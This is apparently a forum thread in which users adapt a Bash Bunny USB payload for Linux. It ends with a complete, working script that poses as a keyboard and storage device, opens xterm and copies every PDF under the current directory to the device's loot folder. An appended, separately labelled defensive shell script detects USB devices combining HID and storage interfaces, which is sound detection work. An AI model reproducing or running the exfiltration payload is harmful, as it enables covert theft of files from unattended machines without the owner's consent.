File Exfil for Linux?


Am3ience

On 2/28/2018 at 7:29 AM, Am3ience said:

Hey guys,

So there are a bunch of file exfiltration payloads for Windows on the git, but does anyone know of one for Linux? I'm trying to see if I can exfil all .docx or .pdf from a folder on Linux to the Bash Bunny. Any help would be great, thanks!

Most Mac payloads will work because Mac uses Unix. So try to use a couple of those, maybe edit one or more lines and you will be set!

9 hours ago, C1PH3R said:

Most Mac payloads will work because Mac uses Unix. So try to use a couple of those, maybe edit one or more lines and you will be set!

I'm looking at this really simple payload, https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil

What kind of things would I need to change for this to work for Linux?

7 hours ago, Am3ience said:

I'm looking at this really simple payload, https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil

What kind of things would I need to change for this to work for Linux?

I will try to help, but note that I have not tested this yet.

You will probably need to change:

line 19: QUACK CONTROL ALT t

That should work; if it doesn't, try to run the commands yourself and see what the error messages are.

Like @C1PH3R said, I'd probably replace Lines 19-22 with:

RUN UNITY xterm

(for some reason I've had better luck executing commands in xterm than with terminal in Unity)

and you'll also need to change your loot_dir to something like:

/media/$USER/BashBunny/loot/XYZ

then obviously 'killall xterm' instead of terminal.

 

** Also untested


12 hours ago, bg-wa said:

Like @C1PH3R said, I'd probably replace Lines 19-22 with:


RUN UNITY xterm

(for some reason I've had better luck executing commands in xterm than with terminal in Unity)

and you'll also need to change your loot_dir to something like:


/media/$USER/BashBunny/loot/XYZ

then obviously 'killall xterm' instead of terminal.

 

** Also untested

Yeah, this could probably work!


Thanks guys! Managed to figure it out with your help.

For future reference if anyone else stumbles upon this thread, below is the code to exfil PDFs from Fedora, but should work in all Linux distros.

 

LED SETUP
ATTACKMODE HID STORAGE

LED ATTACK
RUN UNITY xterm
Q DELAY 1000 
Q STRING export lootdir=/run/media/\$USER/BashBunny/loot/LinuxGrabber 
Q ENTER
Q STRING mkdir -p \$lootdir
Q ENTER

# Find all PDFs stored in the user's file structure, and copy them over to the BashBunny storage.
Q STRING find . -name "*.pdf" -exec cp '{}' \$lootdir \\\;
Q ENTER 
Q STRING killall xterm
Q ENTER 

# sync the filesystem
sync

LED FINISH 
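
From the defender's side, the payload above depends on the device enumerating as a keyboard and a USB drive at the same time (ATTACKMODE HID STORAGE). The following is an added example, not part of the thread or the Hak5 payload library: a shell check that walks a sysfs-style USB tree and reports devices exposing both a HID and a mass-storage interface. The function names and the fixture values are assumptions made for illustration.

```shell
#!/bin/sh
# Added defensive example (not from the thread): flag USB devices that expose
# both a HID (bInterfaceClass 03) and a mass-storage (08) interface, which is
# how a device in "ATTACKMODE HID STORAGE" presents itself to the host.

# find_hid_storage [root]: print "<device> <vid>:<pid>" for each match.
# root defaults to the live sysfs USB device list.
find_hid_storage() {
    root="${1:-/sys/bus/usb/devices}"
    for dev in "$root"/*; do
        # Device directories carry idVendor; interface directories do not.
        [ -f "$dev/idVendor" ] || continue
        has_hid=0; has_storage=0
        for intf in "$dev"/*:*; do
            [ -f "$intf/bInterfaceClass" ] || continue
            read -r class < "$intf/bInterfaceClass" || true
            case "$class" in
                03) has_hid=1 ;;
                08) has_storage=1 ;;
            esac
        done
        if [ "$has_hid" -eq 1 ] && [ "$has_storage" -eq 1 ]; then
            read -r vid < "$dev/idVendor" || true
            read -r pid < "$dev/idProduct" || true
            printf '%s %s:%s\n' "${dev##*/}" "$vid" "$pid"
        fi
    done
}

# make_sample_tree <dir>: constructed fixture (not real device data) holding
# one keyboard-only device (1-1) and one HID + storage composite (1-2).
make_sample_tree() {
    mkdir -p "$1/1-1/1-1:1.0" "$1/1-2/1-2:1.0" "$1/1-2/1-2:1.1"
    printf '1111\n' > "$1/1-1/idVendor"; printf '0001\n' > "$1/1-1/idProduct"
    printf '03\n' > "$1/1-1/1-1:1.0/bInterfaceClass"
    printf '2222\n' > "$1/1-2/idVendor"; printf '0002\n' > "$1/1-2/idProduct"
    printf '03\n' > "$1/1-2/1-2:1.0/bInterfaceClass"
    printf '08\n' > "$1/1-2/1-2:1.1/bInterfaceClass"
}

# Demo on the constructed fixture; call find_hid_storage with no argument
# to scan the live host instead.
tmp=$(mktemp -d)
make_sample_tree "$tmp"
find_hid_storage "$tmp"
rm -rf "$tmp"
```

Some legitimate devices are also HID plus storage composites, so treat a hit as a triage signal to compare against an inventory of approved hardware rather than as proof of an attack.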

 


Archived

This topic is now archived and is closed to further replies.
